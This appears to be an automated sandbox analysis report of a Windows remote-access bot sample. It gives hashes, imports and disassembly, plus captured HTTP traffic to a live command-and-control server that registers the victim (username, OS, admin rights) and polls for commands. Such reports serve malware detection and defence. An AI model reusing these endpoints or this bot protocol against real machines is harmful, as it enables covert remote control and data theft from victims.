http://65.20.106.109/c2.php?action=fetchcommand&botid=oQLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=DLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
65.20.106.109
unknownUnited States
199592CP-ASDEfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1457367
Start date and time:2024-06-14 16:40:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Leprechaun Hvnc.bin.exe
Detection:MAL
Classification:mal60.winEXE@1/0@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 8
  • Number of non-executed functions: 2
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: Leprechaun Hvnc.bin.exe
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
65.20.106.109CrHadzetWq.exeGet hashmaliciousUnknownBrowse
  • 65.20.106.109/c2.php?action=fetchcommand&botid=e8c9bdcf361ca
CrHadzetWq.exeGet hashmaliciousUnknownBrowse
  • 65.20.106.109/c2.php?action=fetchcommand&botid=0d34581d70ab2
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CP-ASDEhttps://wd21.privrendom.com/Get hashmaliciousUnknownBrowse
  • 65.21.235.194
SecuriteInfo.com.BackDoor.SpyBotNET.62.3223.1756.exeGet hashmaliciousVidarBrowse
  • 65.21.109.161
HTTPS://VALLESTRANSPORT.COMGet hashmaliciousUnknownBrowse
  • 65.21.63.132
Rtq5bR0yeF.exeGet hashmaliciousRedLineBrowse
  • 65.21.63.6
wtrD6RiHlm.exeGet hashmaliciousRedLineBrowse
  • 65.21.63.6
SjLTg00G6b.elfGet hashmaliciousMiraiBrowse
  • 65.20.206.157
kyqWhhZB9T.exeGet hashmaliciousRedLineBrowse
  • 65.21.63.6
101764ZAM2024.exeGet hashmaliciousAgentTeslaBrowse
  • 65.21.125.228
SecuriteInfo.com.FileRepMalware.10630.9616.exeGet hashmaliciousUnknownBrowse
  • 65.21.73.35
https://neweventx.bgmis-mobile.com/Get hashmaliciousHTMLPhisherBrowse
  • 65.21.235.194
No context
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.064831007611413
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Leprechaun Hvnc.bin.exe
File size:16'384 bytes
MD5:e497f871973ee2d1e1a42680efa369e3
SHA1:a694ee791e04b0f60ed48e304a694faec9437e4d
SHA256:3f58c4d27a63e7cac54346db50bde86788e6706e6f730cbff29862284f2150cb
SHA512:5bf27e35d2a7b1d420926b751dab6bb586b69e20f7f18946215e5ae17e1330c79a1da182f977ec8f2615af37e267c6558b66d4172f3cf96386a848ef5bdea034
SSDEEP:192:g+ACeYqeviSJDCWzvYeFqfrPwolraE/cmOPoR4y3Qkuu5LjjfO7If++iuLa3wRy:vqYqepmsvVFqf7kmOPoR4XkHoIKKfR
TLSH:E2721810EEE08F22D4F346B864FC6796453D28599F7581FF299124B8CC716C3A936B27
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G...G...G.......N...G...b...-Y..D...-Y..F...RichG...........PE..L......f...............&.*...........3.......@....@........
Icon Hash:00928e8e8686b000
Entrypoint:0x4033e0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x660190D6 [Mon Mar 25 14:57:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:7b4aa3f51180154f434776a3c7ed1e5b
Instruction
push ebp
mov ebp, esp
sub esp, 5Ch
push 00404634h
call dword ptr [00404040h]
test eax, eax
jne 00007FEB40E966F5h
push FFFFFFF5h
call dword ptr [00404024h]
push 00000000h
lea ecx, dword ptr [ebp-10h]
push ecx
push 00000021h
push 00404650h
push eax
call dword ptr [00404064h]
or eax, FFFFFFFFh
mov esp, ebp
pop ebp
ret
push 00404694h
push eax
call dword ptr [0040403Ch]
mov dword ptr [00405008h], eax
test eax, eax
jne 00007FEB40E966F5h
push FFFFFFF5h
call dword ptr [00404024h]
push 00000000h
lea ecx, dword ptr [ebp-10h]
push ecx
push 00000032h
push 004046A8h
push eax
call dword ptr [00404064h]
or eax, FFFFFFFFh
mov esp, ebp
pop ebp
ret
push 00404710h
push 00000001h
push 00000000h
call dword ptr [00404070h]
call dword ptr [0040406Ch]
cmp eax, 000000B7h
jne 00007FEB40E966D8h
xor eax, eax
mov esp, ebp
pop ebp
ret
push ebx
push esi
push edi
mov edi, dword ptr [00404050h]
mov ebx, dword ptr [00404030h]
mov esi, dword ptr [00404024h]
call 00007FEB40E94BF9h
test eax, eax
je 00007FEB40E966C9h
push 00000050h
push 00404720h
push eax
call 00007FEB40E94BC8h
add esp, 0Ch
mov dword ptr [00405000h], eax
test eax, eax
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x4a000x64.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000x264.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x48f40x1c.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x40000xa8.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x29fd0x2a00e0cf41e0a53c4bc2d176b43ebfccb92fFalse0.5554315476190477data6.413186883989941IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x40000xd860xe008f7321e8fb500920f43325a796dc311bFalse0.43080357142857145data4.248176411884191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x50000x200x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc0x60000x2640x400c0ab20af8b16d5b9bfb79a51dd3c1e4aFalse0.572265625data4.642035244811374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLLImport
WININET.dllHttpSendRequestW, HttpOpenRequestW, InternetReadFile, InternetConnectW, InternetOpenW
KERNEL32.dllGetEnvironmentVariableA, CreateDirectoryA, GetStdHandle, VerSetConditionMask, HeapFree, GetProcessHeap, CreateProcessA, GetModuleFileNameA, GetProcAddress, LoadLibraryW, lstrcmpW, lstrcpyW, lstrcatA, HeapAlloc, lstrlenW, CopyFileA, VerifyVersionInfoW, WriteConsoleA, WriteConsoleW, HeapReAlloc, GetLastError, CreateMutexA, Sleep, lstrcmpA, lstrcatW
ADVAPI32.dllRegCreateKeyW, RegCloseKey, GetUserNameW, RegSetKeyValueA, RegQueryValueExW, RegOpenKeyW
SHELL32.dll

Download Network PCAP: filteredfull

TimestampSource PortDest PortSource IPDest IP
Jun 14, 2024 16:40:58.964314938 CEST4971280192.168.2.665.20.106.109
Jun 14, 2024 16:40:58.969182014 CEST804971265.20.106.109192.168.2.6
Jun 14, 2024 16:40:58.969284058 CEST4971280192.168.2.665.20.106.109
Jun 14, 2024 16:40:58.969537973 CEST4971280192.168.2.665.20.106.109
Jun 14, 2024 16:40:58.974246979 CEST804971265.20.106.109192.168.2.6
Jun 14, 2024 16:41:07.442704916 CEST804971265.20.106.109192.168.2.6
Jun 14, 2024 16:41:07.442919970 CEST4971280192.168.2.665.20.106.109
Jun 14, 2024 16:41:07.443388939 CEST4971280192.168.2.665.20.106.109
Jun 14, 2024 16:41:07.445677042 CEST4971580192.168.2.665.20.106.109
Jun 14, 2024 16:41:07.448148966 CEST804971265.20.106.109192.168.2.6
Jun 14, 2024 16:41:07.450537920 CEST804971565.20.106.109192.168.2.6
Jun 14, 2024 16:41:07.450622082 CEST4971580192.168.2.665.20.106.109
Jun 14, 2024 16:41:07.450814962 CEST4971580192.168.2.665.20.106.109
Jun 14, 2024 16:41:07.455640078 CEST804971565.20.106.109192.168.2.6
Jun 14, 2024 16:41:15.923068047 CEST804971565.20.106.109192.168.2.6
Jun 14, 2024 16:41:15.923311949 CEST4971580192.168.2.665.20.106.109
Jun 14, 2024 16:41:15.923311949 CEST4971580192.168.2.665.20.106.109
Jun 14, 2024 16:41:15.924308062 CEST4971980192.168.2.665.20.106.109
Jun 14, 2024 16:41:15.928642988 CEST804971565.20.106.109192.168.2.6
Jun 14, 2024 16:41:15.929261923 CEST804971965.20.106.109192.168.2.6
Jun 14, 2024 16:41:15.929338932 CEST4971980192.168.2.665.20.106.109
Jun 14, 2024 16:41:15.929435968 CEST4971980192.168.2.665.20.106.109
Jun 14, 2024 16:41:15.934220076 CEST804971965.20.106.109192.168.2.6
Jun 14, 2024 16:41:24.403778076 CEST804971965.20.106.109192.168.2.6
Jun 14, 2024 16:41:24.403879881 CEST4971980192.168.2.665.20.106.109
Jun 14, 2024 16:41:24.403974056 CEST4971980192.168.2.665.20.106.109
Jun 14, 2024 16:41:24.405263901 CEST4972380192.168.2.665.20.106.109
Jun 14, 2024 16:41:24.408843994 CEST804971965.20.106.109192.168.2.6
Jun 14, 2024 16:41:24.410137892 CEST804972365.20.106.109192.168.2.6
Jun 14, 2024 16:41:24.410224915 CEST4972380192.168.2.665.20.106.109
Jun 14, 2024 16:41:24.410379887 CEST4972380192.168.2.665.20.106.109
Jun 14, 2024 16:41:24.415169001 CEST804972365.20.106.109192.168.2.6
Jun 14, 2024 16:41:32.896810055 CEST804972365.20.106.109192.168.2.6
Jun 14, 2024 16:41:32.896934032 CEST4972380192.168.2.665.20.106.109
Jun 14, 2024 16:41:32.897016048 CEST4972380192.168.2.665.20.106.109
Jun 14, 2024 16:41:32.898121119 CEST4972580192.168.2.665.20.106.109
Jun 14, 2024 16:41:32.904788971 CEST804972365.20.106.109192.168.2.6
Jun 14, 2024 16:41:32.905833006 CEST804972565.20.106.109192.168.2.6
Jun 14, 2024 16:41:32.905973911 CEST4972580192.168.2.665.20.106.109
Jun 14, 2024 16:41:32.906147957 CEST4972580192.168.2.665.20.106.109
Jun 14, 2024 16:41:32.910924911 CEST804972565.20.106.109192.168.2.6
Jun 14, 2024 16:41:41.374262094 CEST804972565.20.106.109192.168.2.6
Jun 14, 2024 16:41:41.374342918 CEST4972580192.168.2.665.20.106.109
Jun 14, 2024 16:41:41.374418974 CEST4972580192.168.2.665.20.106.109
Jun 14, 2024 16:41:41.375643015 CEST4972780192.168.2.665.20.106.109
Jun 14, 2024 16:41:41.379250050 CEST804972565.20.106.109192.168.2.6
Jun 14, 2024 16:41:41.380521059 CEST804972765.20.106.109192.168.2.6
Jun 14, 2024 16:41:41.380595922 CEST4972780192.168.2.665.20.106.109
Jun 14, 2024 16:41:41.380737066 CEST4972780192.168.2.665.20.106.109
Jun 14, 2024 16:41:41.385602951 CEST804972765.20.106.109192.168.2.6
Jun 14, 2024 16:41:49.885929108 CEST804972765.20.106.109192.168.2.6
Jun 14, 2024 16:41:49.886130095 CEST4972780192.168.2.665.20.106.109
Jun 14, 2024 16:41:49.886130095 CEST4972780192.168.2.665.20.106.109
Jun 14, 2024 16:41:49.887300968 CEST4972980192.168.2.665.20.106.109
Jun 14, 2024 16:41:49.890961885 CEST804972765.20.106.109192.168.2.6
Jun 14, 2024 16:41:49.892086983 CEST804972965.20.106.109192.168.2.6
Jun 14, 2024 16:41:49.892162085 CEST4972980192.168.2.665.20.106.109
Jun 14, 2024 16:41:49.892290115 CEST4972980192.168.2.665.20.106.109
Jun 14, 2024 16:41:49.897006035 CEST804972965.20.106.109192.168.2.6
Jun 14, 2024 16:41:58.379797935 CEST804972965.20.106.109192.168.2.6
Jun 14, 2024 16:41:58.379878998 CEST4972980192.168.2.665.20.106.109
Jun 14, 2024 16:41:58.379935980 CEST4972980192.168.2.665.20.106.109
Jun 14, 2024 16:41:58.381388903 CEST4973180192.168.2.665.20.106.109
Jun 14, 2024 16:41:58.384696960 CEST804972965.20.106.109192.168.2.6
Jun 14, 2024 16:41:58.386236906 CEST804973165.20.106.109192.168.2.6
Jun 14, 2024 16:41:58.386327982 CEST4973180192.168.2.665.20.106.109
Jun 14, 2024 16:41:58.386521101 CEST4973180192.168.2.665.20.106.109
Jun 14, 2024 16:41:58.392415047 CEST804973165.20.106.109192.168.2.6
Jun 14, 2024 16:42:06.865505934 CEST804973165.20.106.109192.168.2.6
Jun 14, 2024 16:42:06.865783930 CEST4973180192.168.2.665.20.106.109
Jun 14, 2024 16:42:06.865784883 CEST4973180192.168.2.665.20.106.109
Jun 14, 2024 16:42:06.867460966 CEST4973380192.168.2.665.20.106.109
Jun 14, 2024 16:42:06.872396946 CEST804973165.20.106.109192.168.2.6
Jun 14, 2024 16:42:06.872415066 CEST804973365.20.106.109192.168.2.6
Jun 14, 2024 16:42:06.872536898 CEST4973380192.168.2.665.20.106.109
Jun 14, 2024 16:42:06.872760057 CEST4973380192.168.2.665.20.106.109
Jun 14, 2024 16:42:06.877526045 CEST804973365.20.106.109192.168.2.6
Jun 14, 2024 16:42:15.344888926 CEST804973365.20.106.109192.168.2.6
Jun 14, 2024 16:42:15.345041037 CEST4973380192.168.2.665.20.106.109
Jun 14, 2024 16:42:15.345138073 CEST4973380192.168.2.665.20.106.109
Jun 14, 2024 16:42:15.346776962 CEST4973580192.168.2.665.20.106.109
Jun 14, 2024 16:42:15.349934101 CEST804973365.20.106.109192.168.2.6
Jun 14, 2024 16:42:15.351867914 CEST804973565.20.106.109192.168.2.6
Jun 14, 2024 16:42:15.351988077 CEST4973580192.168.2.665.20.106.109
Jun 14, 2024 16:42:15.352087021 CEST4973580192.168.2.665.20.106.109
Jun 14, 2024 16:42:15.356853962 CEST804973565.20.106.109192.168.2.6
Jun 14, 2024 16:42:23.832591057 CEST804973565.20.106.109192.168.2.6
Jun 14, 2024 16:42:23.832779884 CEST4973580192.168.2.665.20.106.109
Jun 14, 2024 16:42:23.832874060 CEST4973580192.168.2.665.20.106.109
Jun 14, 2024 16:42:23.834291935 CEST4973680192.168.2.665.20.106.109
Jun 14, 2024 16:42:23.838462114 CEST804973565.20.106.109192.168.2.6
Jun 14, 2024 16:42:23.839230061 CEST804973665.20.106.109192.168.2.6
Jun 14, 2024 16:42:23.839306116 CEST4973680192.168.2.665.20.106.109
Jun 14, 2024 16:42:23.839447021 CEST4973680192.168.2.665.20.106.109
Jun 14, 2024 16:42:23.844894886 CEST804973665.20.106.109192.168.2.6
Jun 14, 2024 16:42:32.321790934 CEST804973665.20.106.109192.168.2.6
Jun 14, 2024 16:42:32.321938038 CEST4973680192.168.2.665.20.106.109
Jun 14, 2024 16:42:32.322033882 CEST4973680192.168.2.665.20.106.109
Jun 14, 2024 16:42:32.323543072 CEST4973780192.168.2.665.20.106.109
Jun 14, 2024 16:42:32.327486038 CEST804973665.20.106.109192.168.2.6
Jun 14, 2024 16:42:32.328654051 CEST804973765.20.106.109192.168.2.6
Jun 14, 2024 16:42:32.328761101 CEST4973780192.168.2.665.20.106.109
Jun 14, 2024 16:42:32.328937054 CEST4973780192.168.2.665.20.106.109
Jun 14, 2024 16:42:32.334161997 CEST804973765.20.106.109192.168.2.6
Jun 14, 2024 16:42:40.812381029 CEST804973765.20.106.109192.168.2.6
Jun 14, 2024 16:42:40.812510967 CEST4973780192.168.2.665.20.106.109
Jun 14, 2024 16:42:40.812597990 CEST4973780192.168.2.665.20.106.109
Jun 14, 2024 16:42:40.813888073 CEST4973880192.168.2.665.20.106.109
Jun 14, 2024 16:42:40.818528891 CEST804973765.20.106.109192.168.2.6
Jun 14, 2024 16:42:40.818749905 CEST804973865.20.106.109192.168.2.6
Jun 14, 2024 16:42:40.818835020 CEST4973880192.168.2.665.20.106.109
Jun 14, 2024 16:42:40.818985939 CEST4973880192.168.2.665.20.106.109
Jun 14, 2024 16:42:40.823726892 CEST804973865.20.106.109192.168.2.6
Jun 14, 2024 16:42:49.299453020 CEST804973865.20.106.109192.168.2.6
Jun 14, 2024 16:42:49.299756050 CEST4973880192.168.2.665.20.106.109
Jun 14, 2024 16:42:49.299871922 CEST4973880192.168.2.665.20.106.109
Jun 14, 2024 16:42:49.301242113 CEST4974180192.168.2.665.20.106.109
Jun 14, 2024 16:42:49.304780006 CEST804973865.20.106.109192.168.2.6
Jun 14, 2024 16:42:49.306054115 CEST804974165.20.106.109192.168.2.6
Jun 14, 2024 16:42:49.306128025 CEST4974180192.168.2.665.20.106.109
Jun 14, 2024 16:42:49.306262016 CEST4974180192.168.2.665.20.106.109
Jun 14, 2024 16:42:49.311244965 CEST804974165.20.106.109192.168.2.6
Jun 14, 2024 16:42:57.772859097 CEST804974165.20.106.109192.168.2.6
Jun 14, 2024 16:42:57.772989035 CEST4974180192.168.2.665.20.106.109
Jun 14, 2024 16:42:57.773206949 CEST4974180192.168.2.665.20.106.109
Jun 14, 2024 16:42:57.774775982 CEST4974280192.168.2.665.20.106.109
Jun 14, 2024 16:42:57.777957916 CEST804974165.20.106.109192.168.2.6
Jun 14, 2024 16:42:57.779728889 CEST804974265.20.106.109192.168.2.6
Jun 14, 2024 16:42:57.779810905 CEST4974280192.168.2.665.20.106.109
Jun 14, 2024 16:42:57.780006886 CEST4974280192.168.2.665.20.106.109
Jun 14, 2024 16:42:57.784801006 CEST804974265.20.106.109192.168.2.6
  • 65.20.106.109
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.64971265.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:40:58.969537973 CEST266OUTGET /c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges=Admin HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.64971565.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:07.450814962 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.64971965.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:15.929435968 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.64972365.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:24.410379887 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.64972565.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:32.906147957 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5192.168.2.64972765.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:41.380737066 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
6192.168.2.64972965.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:49.892290115 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
7192.168.2.64973165.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:41:58.386521101 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
8192.168.2.64973365.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:06.872760057 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
9192.168.2.64973565.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:15.352087021 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
10192.168.2.64973665.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:23.839447021 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
11192.168.2.64973765.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:32.328937054 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
12192.168.2.64973865.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:40.818985939 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
13192.168.2.64974165.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:49.306262016 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
14192.168.2.64974265.20.106.109806892C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
TimestampBytes transferredDirectionData
Jun 14, 2024 16:42:57.780006886 CEST214OUTGET /c2.php?action=fetchcommand&botid= HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
Host: 65.20.106.109


050100s020406080100

Click to jump to process

050100s0.00510MB

Click to jump to process

  • File
  • Registry

Click to dive into process behavior distribution

Target ID:0
Start time:10:40:56
Start date:14/06/2024
Path:C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe"
Imagebase:0x490000
File size:16'384 bytes
MD5 hash:E497F871973EE2D1E1A42680EFA369E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:12.3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:52.8%
Total number of Nodes:125
Total number of Limit Nodes:7
Show Legend
Hide Nodes/Edges
execution_graph 801 4933e0 LoadLibraryW 802 493418 GetProcAddress 801->802 803 4933f5 GetStdHandle WriteConsoleW 801->803 804 49342d GetStdHandle WriteConsoleW 802->804 805 493450 CreateMutexA GetLastError 802->805 806 49346c 805->806 808 493472 805->808 810 4934a9 GetStdHandle WriteConsoleW GetProcessHeap HeapAlloc 808->810 819 49357e 808->819 846 4919b0 InternetOpenW 808->846 847 491990 InternetConnectW 808->847 848 491640 RegOpenKeyW 810->848 812 4934d7 813 4934db GetStdHandle WriteConsoleW 812->813 816 49351d GetProcessHeap HeapAlloc lstrcpyW lstrcatW lstrcatW 812->816 817 4939f1 812->817 874 4911f0 RegOpenKeyW 812->874 851 4912a0 6 API calls 813->851 880 491ab0 HttpOpenRequestW 816->880 819->808 886 4919d0 7 API calls 819->886 822 4935bf GetStdHandle WriteConsoleW GetStdHandle 833 4935a5 822->833 823 4935ed WriteConsoleA GetStdHandle WriteConsoleW 823->833 824 493691 lstrcmpA 824->833 825 49395c GetProcessHeap HeapFree GetProcessHeap HeapFree Sleep 826 493981 GetProcessHeap HeapAlloc lstrcpyW lstrcatW lstrcatW 825->826 829 491ab0 4 API calls 826->829 827 49372f GetProcessHeap HeapAlloc 827->833 828 493802 lstrcmpA 830 493818 